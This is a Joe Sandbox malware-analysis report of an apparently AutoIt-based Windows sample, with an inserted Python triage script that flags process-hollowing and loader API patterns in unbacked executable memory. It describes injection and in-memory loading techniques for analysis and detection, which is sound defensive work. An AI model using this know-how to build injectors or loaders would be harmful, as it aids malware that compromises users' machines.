                                                        • Opcode ID: 44a70aab24d296bd458b9e9313b66afd487f4b7d8242b79d8cffb708330ef215
                                                        • Instruction ID: 03b4e99bd853f9f88dbfc9a0ceb7647463f9dea64f483651b6a80a7a65b3c8ff
                                                        • Opcode Fuzzy Hash: 44a70aab24d296bd458b9e9313b66afd487f4b7d8242b79d8cffb708330ef215
                                                        • Instruction Fuzzy Hash: A7213775900308EFEB10DFA4EC09B9D7BB2FB08711F10412AE504AA6B1DBB95A909F84

                                                        Control-flow Graph

                                                        APIs
                                                        • DefWindowProcW.USER32(?,?,?,?), ref: 000C36D2
                                                        • KillTimer.USER32(?,00000001), ref: 000C36FC
                                                        • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 000C371F
                                                        • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 000C372A
                                                        • CreatePopupMenu.USER32 ref: 000C373E
                                                        • PostQuitMessage.USER32(00000000), ref: 000C374D
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2161814461.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                        • Associated: 00000000.00000002.2161796787.00000000000C0000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2161863427.000000000014F000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2161863427.0000000000174000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2161917801.000000000017E000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2161935057.0000000000187000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_c0000_fFoOcuxK7M.jbxd
                                                        Similarity
                                                        • API ID: MessageTimerWindow$CreateKillMenuPopupPostProcQuitRegister
                                                        • String ID: TaskbarCreated
                                                        • API String ID: 129472671-2362178303
                                                        • Opcode ID: 655a0733869d9966f11128d171336617b780c623a0d53cfba838fbbc07e8d77e
                                                        • Instruction ID: e88ca1d200dd0247f7826fada97d1f91c2719cd4145181fa2242e3e494965b0b
                                                        • Opcode Fuzzy Hash: 655a0733869d9966f11128d171336617b780c623a0d53cfba838fbbc07e8d77e
                                                        • Instruction Fuzzy Hash: 754107B5224509BBDB346F64EC09FBD37A7EB01301F14822EF602967A2CB649B919761

                                                        Control-flow Graph

                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2161814461.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                        • Associated: 00000000.00000002.2161796787.00000000000C0000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2161863427.000000000014F000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2161863427.0000000000174000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2161917801.000000000017E000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2161935057.0000000000187000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_c0000_fFoOcuxK7M.jbxd
                                                        Similarity
                                                        • API ID: FileLibraryLoadModuleName__wcsicmp_l_memmove
                                                        • String ID: /AutoIt3ExecuteLine$/AutoIt3ExecuteScript$/AutoIt3OutputDebug$/ErrorStdOut$>>>AUTOIT NO CMDEXECUTE<<<$CMDLINE$CMDLINERAW
                                                        • API String ID: 1825951767-3513169116
                                                        • Opcode ID: 7b599a2c79ba7c93441653a9d3be50dc972354266f787bcd4e739fbd43b008c7
                                                        • Instruction ID: 414e7fe915185702a0f8032064901d156d2e07fe6d28b12b3b86895a1326d273
                                                        • Opcode Fuzzy Hash: 7b599a2c79ba7c93441653a9d3be50dc972354266f787bcd4e739fbd43b008c7
                                                        • Instruction Fuzzy Hash: E3A1397291022DAADB14EBA4DC95EEEB779FF14310F40442EF416B7192DF745A08CBA0

                                                        Control-flow Graph

                                                        APIs
                                                        • CreateFileW.KERNELBASE(00000000,?,80000000,00000007,00000000,00000003,00000080,00000000,?,00000000), ref: 014CF0D1
                                                        • VirtualFree.KERNELBASE(00000000,00000000,00008000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 014CF2F7
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2162345808.00000000014CC000.00000040.00000020.00020000.00000000.sdmp, Offset: 014CC000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_14cc000_fFoOcuxK7M.jbxd
                                                        Similarity
                                                        • API ID: CreateFileFreeVirtual
                                                        • String ID:
                                                        • API String ID: 204039940-0
                                                        • Opcode ID: d349c2c11462b54f33c86561be68849ac3e84e681e3d8bb3fdc8e10bc75df865
                                                        • Instruction ID: e2ca696df020f9aa346453f10edd2efb046076eef1ebef841f9124ecb2ea5204
                                                        • Opcode Fuzzy Hash: d349c2c11462b54f33c86561be68849ac3e84e681e3d8bb3fdc8e10bc75df865
                                                        • Instruction Fuzzy Hash: 56A10778E00209EBDB54CFE4C894BEEBBB6BF48704F20855AE501BB290C7799A45CB54

                                                        Control-flow Graph

                                                        APIs
                                                        • CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 000C3A03
                                                        • CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 000C3A24
                                                        • ShowWindow.USER32(00000000,?,?), ref: 000C3A38
                                                        • ShowWindow.USER32(00000000,?,?), ref: 000C3A41
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2161814461.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                        • Associated: 00000000.00000002.2161796787.00000000000C0000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2161863427.000000000014F000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2161863427.0000000000174000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2161917801.000000000017E000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2161935057.0000000000187000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_c0000_fFoOcuxK7M.jbxd
                                                        Similarity
                                                        • API ID: Window$CreateShow
                                                        • String ID: AutoIt v3$edit
                                                        • API String ID: 1584632944-3779509399
                                                        • Opcode ID: 0b7a0e7939de47b40651f5d0d84c4c03a1b05afb52b1aec8b1e3a021b1a744e2
                                                        • Instruction ID: 9fc447972c4b1f2beba047fc8e2a7d1f0b82ad063c3ef68a6941246df08252b4
                                                        • Opcode Fuzzy Hash: 0b7a0e7939de47b40651f5d0d84c4c03a1b05afb52b1aec8b1e3a021b1a744e2
                                                        • Instruction Fuzzy Hash: 95F03A74540290BEEB315B23AC08E2B3E7FD7C7F50B00002EB904A2670CA650881CBB0

                                                        Control-flow Graph
                                                        control_flow_graph 1074 14cedc0-14ceef7 call 14cca10 call 14cecb0 CreateFileW 1081 14ceefe-14cef0e 1074->1081 1082 14ceef9 1074->1082 1085 14cef15-14cef2f VirtualAlloc 1081->1085 1086 14cef10 1081->1086 1083 14cefae-14cefb3 1082->1083 1087 14cef31 1085->1087 1088 14cef33-14cef4a ReadFile 1085->1088 1086->1083 1087->1083 1089 14cef4c 1088->1089 1090 14cef4e-14cef88 call 14cecf0 call 14cdcb0 1088->1090 1089->1083 1095 14cef8a-14cef9f call 14ced40 1090->1095 1096 14cefa4-14cefac ExitProcess 1090->1096 1095->1096 1096->1083
                                                        APIs
                                                          • Part of subcall function 014CECB0: Sleep.KERNELBASE(000001F4), ref: 014CECC1
                                                        • CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000), ref: 014CEEED
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2162345808.00000000014CC000.00000040.00000020.00020000.00000000.sdmp, Offset: 014CC000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_14cc000_fFoOcuxK7M.jbxd
                                                        Similarity
                                                        • API ID: CreateFileSleep
                                                        • String ID: LO73WEXQDHNGK7PVM87
                                                        • API String ID: 2694422964-1590490914
                                                        • Opcode ID: c81313d6bf3e86320eb68458fd65169ea8b7e031a41a7051d7a4a3f642b710d5
                                                        • Instruction ID: 02d276ba686573d262735543391669536dae2cbb0912bc154167a56f43ebe7d1
                                                        • Opcode Fuzzy Hash: c81313d6bf3e86320eb68458fd65169ea8b7e031a41a7051d7a4a3f642b710d5
                                                        • Instruction Fuzzy Hash: AC518E74D04289EAEF11DBA4C814BEEBB79AF14704F00419DE608BB2C0D77A4B45CBA5

                                                        Control-flow Graph
                                                        control_flow_graph 1098 c407c-c4092 1099 c416f-c4173 1098->1099 1100 c4098-c40ad call c7a16 1098->1100 1103 fd3c8-fd3d7 LoadStringW 1100->1103 1104 c40b3-c40d3 call c7bcc 1100->1104 1107 fd3e2-fd3fa call c7b2e call c6fe3 1103->1107 1104->1107 1108 c40d9-c40dd 1104->1108 1117 c40ed-c416a call e2de0 call c454e call e2dbc Shell_NotifyIconW call c5904 1107->1117 1120 fd400-fd41e call c7cab call c6fe3 call c7cab 1107->1120 1110 c4174-c417d call c8047 1108->1110 1111 c40e3-c40e8 call c7b2e 1108->1111 1110->1117 1111->1117 1117->1099 1120->1117
                                                        APIs
                                                        • LoadStringW.USER32(00000065,?,0000007F,00000104), ref: 000FD3D7
                                                          • Part of subcall function 000C7BCC: _memmove.LIBCMT ref: 000C7C06
                                                        • _memset.LIBCMT ref: 000C40FC
                                                        • _wcscpy.LIBCMT ref: 000C4150
                                                        • Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 000C4160
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2161814461.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                        • Associated: 00000000.00000002.2161796787.00000000000C0000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2161863427.000000000014F000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2161863427.0000000000174000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2161917801.000000000017E000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2161935057.0000000000187000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_c0000_fFoOcuxK7M.jbxd
                                                        Similarity
                                                        • API ID: IconLoadNotifyShell_String_memmove_memset_wcscpy
                                                        • String ID: Line:
                                                        • API String ID: 3942752672-1585850449
                                                        • Opcode ID: 3a352a5d7dde181d8c865ab015debc452e29312abb24d580a4d5599fe388ba14
                                                        • Instruction ID: 7e8c965b048ab6c4ef4e510b6da2284c935229fa51ba8c87fbdcb09b763d30c9
                                                        • Opcode Fuzzy Hash: 3a352a5d7dde181d8c865ab015debc452e29312abb24d580a4d5599fe388ba14
                                                        • Instruction Fuzzy Hash: 27318D71008705AFD361EB60DC46FDF77E9EB54310F20491EF689921A2EF70A688CB92

                                                        Control-flow Graph
                                                        control_flow_graph 1133 c686a-c6891 call c4ddd 1136 c6897-c68a5 call c4ddd 1133->1136 1137 fe031-fe041 call 12955b 1133->1137 1136->1137 1144 c68ab-c68b1 1136->1144 1140 fe046-fe048 1137->1140 1142 fe04a-fe04d call c4e4a 1140->1142 1143 fe067-fe0af call e0db6 1140->1143 1148 fe052-fe061 call 1242f8 1142->1148 1153 fe0d4 1143->1153 1154 fe0b1-fe0bb 1143->1154 1147 c68b7-c68d9 call c6a8c 1144->1147 1144->1148 1148->1143 1156 fe0d6-fe0e9 1153->1156 1157 fe0cf-fe0d0 1154->1157 1158 fe0ef 1156->1158 1159 fe260-fe263 call e2d55 1156->1159 1160 fe0bd-fe0cc 1157->1160 1161 fe0d2 1157->1161 1162 fe0f6-fe0f9 call c7480 1158->1162 1165 fe268-fe271 call c4e4a 1159->1165 1160->1157 1161->1156 1167 fe0fe-fe120 call c5db2 call 1273e9 1162->1167 1170 fe273-fe283 call c7616 call c5d9b 1165->1170 1177 fe134-fe13e call 1273d3 1167->1177 1178 fe122-fe12f 1167->1178 1184 fe288-fe2b8 call 11f7a1 call e0e2c call e2d55 call c4e4a 1170->1184 1186 fe158-fe162 call 1273bd 1177->1186 1187 fe140-fe153 1177->1187 1180 fe227-fe237 call c750f 1178->1180 1180->1167 1190 fe23d-fe247 call c735d 1180->1190 1184->1170 1194 fe176-fe180 call c5e2a 1186->1194 1195 fe164-fe171 1186->1195 1187->1180 1197 fe24c-fe25a 1190->1197 1194->1180 1202 fe186-fe19e call 11f73d 1194->1202 1195->1180 1197->1159 1197->1162 1208 fe1c1-fe1c4 1202->1208 1209 fe1a0-fe1bf call c7de1 call c5904 1202->1209 1210 fe1c6-fe1e1 call c7de1 call c6839 call c5904 1208->1210 1211 fe1f2-fe1f5 1208->1211 1232 fe1e2-fe1f0 call c5db2 1209->1232 1210->1232 1215 fe1f7-fe200 call 11f65e 1211->1215 1216 fe215-fe218 call 12737f 1211->1216 1215->1184 1227 fe206-fe210 call e0e2c 1215->1227 1221 fe21d-fe226 call e0e2c 1216->1221 1221->1180 1227->1167 1232->1221
                                                        APIs
                                                          • Part of subcall function 000C4DDD: LoadLibraryExW.KERNEL32(?,00000000,00000002,?,001852F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 000C4E0F
                                                        • _free.LIBCMT ref: 000FE263
                                                        • _free.LIBCMT ref: 000FE2AA
                                                          • Part of subcall function 000C6A8C: SetCurrentDirectoryW.KERNEL32(?,?,?,?,00000000), ref: 000C6BAD
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2161814461.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                        • Associated: 00000000.00000002.2161796787.00000000000C0000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2161863427.000000000014F000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2161863427.0000000000174000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2161917801.000000000017E000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2161935057.0000000000187000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_c0000_fFoOcuxK7M.jbxd
                                                        Similarity
                                                        • API ID: _free$CurrentDirectoryLibraryLoad
                                                        • String ID: >>>AUTOIT SCRIPT<<<$Bad directive syntax error
                                                        • API String ID: 2861923089-1757145024
                                                        • Opcode ID: e6900df6847237eca62bf8294e3d3ccc699ab2dcf47372fb1bc03770ea19aee8
                                                        • Instruction ID: a49b42b6b20addd4940a3148ecf6841fc47dbfcc8ae1cb3a868ba459165ee4e0
                                                        • Opcode Fuzzy Hash: e6900df6847237eca62bf8294e3d3ccc699ab2dcf47372fb1bc03770ea19aee8
                                                        • Instruction Fuzzy Hash: FC919D7190026DAFCF14EFA4CC919EDB7B8FF15310B10442EF916AB2A2EB70A955DB50
                                                        APIs
                                                        • RegOpenKeyExW.KERNELBASE(80000001,Control Panel\Mouse,00000000,00000001,00000000,00000003,00000000,80000001,80000001,?,000C35A1,SwapMouseButtons,00000004,?), ref: 000C35D4
                                                        • RegQueryValueExW.KERNELBASE(00000000,00000000,00000000,00000000,?,?,?,?,000C35A1,SwapMouseButtons,00000004,?,?,?,?,000C2754), ref: 000C35F5
                                                        • RegCloseKey.KERNELBASE(00000000,?,?,000C35A1,SwapMouseButtons,00000004,?,?,?,?,000C2754), ref: 000C3617
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2161814461.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                        • Associated: 00000000.00000002.2161796787.00000000000C0000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2161863427.000000000014F000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2161863427.0000000000174000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2161917801.000000000017E000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2161935057.0000000000187000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_c0000_fFoOcuxK7M.jbxd
                                                        Similarity
                                                        • API ID: CloseOpenQueryValue
                                                        • String ID: Control Panel\Mouse
                                                        • API String ID: 3677997916-824357125
                                                        • Opcode ID: 75752eb7e0120d0462d916c387617fb0967fcd591c093f1caf08deea840e606f
                                                        • Instruction ID: 8f5dd00cf7d94063cb88e646988a298f3b424df17da7e4a3d8d64519a67f306e
                                                        • Opcode Fuzzy Hash: 75752eb7e0120d0462d916c387617fb0967fcd591c093f1caf08deea840e606f
                                                        • Instruction Fuzzy Hash: DF114575620208BFDB208F64DC84EAFBBB9EF45740F01C469F805D7220E2729E419BA0
                                                        APIs
                                                        • CreateProcessW.KERNELBASE(?,00000000), ref: 014CE46B
                                                        • Wow64GetThreadContext.KERNEL32(?,00010007), ref: 014CE501
                                                        • ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 014CE523
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2162345808.00000000014CC000.00000040.00000020.00020000.00000000.sdmp, Offset: 014CC000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_14cc000_fFoOcuxK7M.jbxd
                                                        Similarity
                                                        • API ID: Process$ContextCreateMemoryReadThreadWow64
                                                        • String ID:
                                                        • API String ID: 2438371351-0
                                                        • Opcode ID: 91de96a0508c6d9b88b93d6c14255c09b3dee72855056c89e06ebe7f8a996ab2
                                                        • Instruction ID: 1a30e677bb63c7b559d0b9270414ae8e3c11f4d66bfa3e8e668429a335b338b7
                                                        • Opcode Fuzzy Hash: 91de96a0508c6d9b88b93d6c14255c09b3dee72855056c89e06ebe7f8a996ab2
                                                        • Instruction Fuzzy Hash: D4620E34A14258DBEB24CFA4C850BDEB776EF58700F1091A9D10DEB3A0E7799E81CB59
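Two of the function blocks above live in the same region, dumped as 00000000.00000002.2162345808.00000000014CC000.00000040.00000020.00020000.00000000.sdmp and marked "based on PE: false": the block at 014CEDC0 (CreateFileW with GENERIC_READ 0x80000000 and OPEN_EXISTING 3, then VirtualAlloc, ReadFile and ExitProcess, with a Sleep(0x1F4 = 500 ms) in a callee) and the block at 014CE46B (CreateProcessW, Wow64GetThreadContext with 0x00010007 = CONTEXT_FULL for an x86 context, then a 4-byte ReadProcessMemory, which is consistent with reading a single 32-bit pointer out of the child). Read together they have the shape of a loader that pulls a payload from disk into private executable memory and an injector that spawns a child and inspects its thread context. The Python below is an added example and is not part of the Joe Sandbox report or of any tool the report describes: it parses the report's own APIs, control_flow_graph and Source File lines, decodes the dump-name fields, and tags blocks that combine unbacked executable memory with these API groups. The field layout of the .sdmp name is an assumption that fits every name on this page (the fifth field reads as the Win32 page-protection constant, the seventh as the memory type); the sample input is copied, abridged, from this report.

```python
"""Triage of Joe Sandbox 'APIs' / 'Memory Dump Source' lines.

Added example, not part of the Joe Sandbox report. The sample lines below are
copied (abridged) from this report. The .sdmp field layout is an assumption
that fits every dump name on the page: field 5 reads as the Win32 page
protection and field 7 as the memory type (MEM_PRIVATE / MEM_IMAGE).
"""
import re
from dataclasses import dataclass

MEM_IMAGE = 0x1000000
PAGE_PROTECT = {0x02: "PAGE_READONLY", 0x04: "PAGE_READWRITE",
                0x20: "PAGE_EXECUTE_READ", 0x40: "PAGE_EXECUTE_READWRITE"}
MEM_TYPE = {0x20000: "MEM_PRIVATE", 0x40000: "MEM_MAPPED", MEM_IMAGE: "MEM_IMAGE"}
EXECUTE_BITS = 0xF0  # PAGE_EXECUTE, _READ, _READWRITE, _WRITECOPY

SOURCE_RE = re.compile(r"Source File: (?P<name>\S+\.sdmp), Offset: \w+, based on PE: (?P<pe>true|false)")
API_RE = re.compile(r"•\s*(?P<api>\w+)\.(?P<mod>\w+)\((?P<args>[^)]*)\), ref: (?P<ref>[0-9A-Fa-f]+)")

# API groups that together make up a process-hollowing style injector: a block
# needs one spawn, one thread-context and one remote-memory primitive to count.
HOLLOWING = {
    "spawn": {"CreateProcessW", "CreateProcessA", "CreateProcessInternalW"},
    "context": {"GetThreadContext", "Wow64GetThreadContext",
                "SetThreadContext", "Wow64SetThreadContext"},
    "memory": {"ReadProcessMemory", "WriteProcessMemory",
               "VirtualAllocEx", "NtUnmapViewOfSection"},
}
LOADER = {"CreateFileW", "VirtualAlloc", "ReadFile"}  # file read straight into fresh memory


@dataclass
class Region:
    base: int
    protect: int
    mem_type: int
    pe_backed: bool

    @property
    def unbacked_executable(self) -> bool:
        """Executable pages that belong to no image: shellcode or unpacked code."""
        return bool(self.protect & EXECUTE_BITS) and self.mem_type != MEM_IMAGE and not self.pe_backed

    def describe(self) -> str:
        return (f"base=0x{self.base:x} {PAGE_PROTECT.get(self.protect, hex(self.protect))} "
                f"{MEM_TYPE.get(self.mem_type, hex(self.mem_type))} pe_backed={self.pe_backed}")


def parse_region(name: str, pe_backed: bool) -> Region:
    f = name.split(".")  # assumed: pid.run.id.base.protect.?.type.?.sdmp
    return Region(int(f[3], 16), int(f[4], 16), int(f[6], 16), pe_backed)


def cfg_apis(line: str):
    # In the dumped graph source, API names are the only tokens that start with
    # a capital and contain lower-case letters; block ids and 'call' do not.
    return [t for t in line.split() if t[0].isupper() and any(c.islower() for c in t)]


def tag_apis(apis):
    names = set(apis)
    tags = []
    if all(names & group for group in HOLLOWING.values()):
        tags.append("hollowing-candidate")
    if LOADER <= names:
        tags.append("file-to-memory-loader")
    return tags


def triage(report_text: str):
    """Group API names per function block; a block is closed by its 'Source File' line."""
    blocks, apis = [], []
    for raw in report_text.splitlines():
        line = raw.strip()
        if line.startswith("control_flow_graph"):
            apis += cfg_apis(line)
        elif (m := API_RE.search(line)):  # 'Part of subcall' lines do not match: they belong to the callee
            apis.append(m.group("api"))
        elif (m := SOURCE_RE.search(line)):
            region = parse_region(m.group("name"), m.group("pe") == "true")
            tags = tag_apis(apis)
            if region.unbacked_executable:
                tags.append("unbacked-executable-region")
            blocks.append({"apis": list(dict.fromkeys(apis)), "region": region, "tags": tags})
            apis = []
    return blocks


# Constructed sample input: three blocks abridged from this report.
REPORT_EXCERPT = r"""
control_flow_graph 1074 14cedc0-14ceef7 call 14cca10 call 14cecb0 CreateFileW 1081 14ceefe-14cef0e 1074->1081 1085 14cef15-14cef2f VirtualAlloc 1081->1085 1088 14cef33-14cef4a ReadFile 1085->1088 1096 14cefa4-14cefac ExitProcess 1090->1096
• Part of subcall function 014CECB0: Sleep.KERNELBASE(000001F4), ref: 014CECC1
• CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000), ref: 014CEEED
• Source File: 00000000.00000002.2162345808.00000000014CC000.00000040.00000020.00020000.00000000.sdmp, Offset: 014CC000, based on PE: false
• CreateProcessW.KERNELBASE(?,00000000), ref: 014CE46B
• Wow64GetThreadContext.KERNEL32(?,00010007), ref: 014CE501
• ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 014CE523
• Source File: 00000000.00000002.2162345808.00000000014CC000.00000040.00000020.00020000.00000000.sdmp, Offset: 014CC000, based on PE: false
• RegOpenKeyExW.KERNELBASE(80000001,Control Panel\Mouse,00000000,00000001,00000000,00000003,00000000,80000001,80000001,?,000C35A1,SwapMouseButtons,00000004,?), ref: 000C35D4
• RegQueryValueExW.KERNELBASE(00000000,00000000,00000000,00000000,?,?,?,?,000C35A1,SwapMouseButtons,00000004,?,?,?,?,000C2754), ref: 000C35F5
• RegCloseKey.KERNELBASE(00000000,?,?,000C35A1,SwapMouseButtons,00000004,?,?,?,?,000C2754), ref: 000C3617
• Source File: 00000000.00000002.2161814461.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
"""

if __name__ == "__main__":
    for b in triage(REPORT_EXCERPT):
        print(b["region"].describe(), b["apis"], b["tags"])
```

On the excerpt the loader and injector blocks each come back with unbacked-executable-region plus their API tag, while the Control Panel\Mouse registry read, which sits in the image-backed section at 000C1000 and is ordinary AutoIt runtime housekeeping, gets no tag. To run it over a whole report, feed it the text of the Execution Graph section; "Part of subcall function" lines are ignored on purpose because the report attributes those calls to the callee, not to the block being listed.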
                                                        APIs
                                                          • Part of subcall function 000C4EE5: _fseek.LIBCMT ref: 000C4EFD
                                                          • Part of subcall function 00129734: _wcscmp.LIBCMT ref: 00129824
                                                          • Part of subcall function 00129734: _wcscmp.LIBCMT ref: 00129837
                                                        • _free.LIBCMT ref: 001296A2
                                                        • _free.LIBCMT ref: 001296A9
                                                        • _free.LIBCMT ref: 00129714
                                                          • Part of subcall function 000E2D55: RtlFreeHeap.NTDLL(00000000,00000000,?,000E9A24), ref: 000E2D69
                                                          • Part of subcall function 000E2D55: GetLastError.KERNEL32(00000000,?,000E9A24), ref: 000E2D7B
                                                        • _free.LIBCMT ref: 0012971C
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2161814461.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                        • Associated: 00000000.00000002.2161796787.00000000000C0000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2161863427.000000000014F000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2161863427.0000000000174000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2161917801.000000000017E000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2161935057.0000000000187000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_c0000_fFoOcuxK7M.jbxd
                                                        Similarity
                                                        • API ID: _free$_wcscmp$ErrorFreeHeapLast_fseek
                                                        • String ID:
                                                        • API String ID: 1552873950-0
                                                        • Opcode ID: 83a1bf45cb5b46f0fbbb2b282febcfcf75e63ad05b5baa694a85d9b23f0f737c
                                                        • Instruction ID: 6bd556ddbe072f7de40cd91e0a2335ae24fddd0f1706e39202bd1bdabe845f90
                                                        • Opcode Fuzzy Hash: 83a1bf45cb5b46f0fbbb2b282febcfcf75e63ad05b5baa694a85d9b23f0f737c
                                                        • Instruction Fuzzy Hash: 19513EB1D04258AFDF249F65DC81ADEBB79FF48300F1044AEB649A3242DB715A91CF58
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2161814461.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                        • Associated: 00000000.00000002.2161796787.00000000000C0000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2161863427.000000000014F000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2161863427.0000000000174000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2161917801.000000000017E000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2161935057.0000000000187000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_c0000_fFoOcuxK7M.jbxd
                                                        Similarity
                                                        • API ID: __flsbuf__flush__getptd_noexit__write_memmove
                                                        • String ID:
                                                        • API String ID: 2782032738-0
                                                        • Opcode ID: 998aeda2236a74d80706e5f9a46343bd1135ee917ddd04e378ba6ed458c3dace
                                                        • Instruction ID: 670b9fa977b3c185bf73bac9263652b5e6131725d8d453b69aa9b72aeeb67db2
                                                        • Opcode Fuzzy Hash: 998aeda2236a74d80706e5f9a46343bd1135ee917ddd04e378ba6ed458c3dace
                                                        • Instruction Fuzzy Hash: 6841D674A047C69FDB28CE6BC9809AE77E6EF82360F24817DE855E7640DB70DD408B80
                                                        APIs
                                                        • _memset.LIBCMT ref: 000C44CF
                                                          • Part of subcall function 000C407C: _memset.LIBCMT ref: 000C40FC
                                                          • Part of subcall function 000C407C: _wcscpy.LIBCMT ref: 000C4150
                                                          • Part of subcall function 000C407C: Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 000C4160
                                                        • KillTimer.USER32(?,00000001,?,?), ref: 000C4524
                                                        • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 000C4533
                                                        • Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 000FD4B9
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2161814461.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                        • Associated: 00000000.00000002.2161796787.00000000000C0000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2161863427.000000000014F000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2161863427.0000000000174000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2161917801.000000000017E000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2161935057.0000000000187000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_c0000_fFoOcuxK7M.jbxd
                                                        Similarity
                                                        • API ID: IconNotifyShell_Timer_memset$Kill_wcscpy
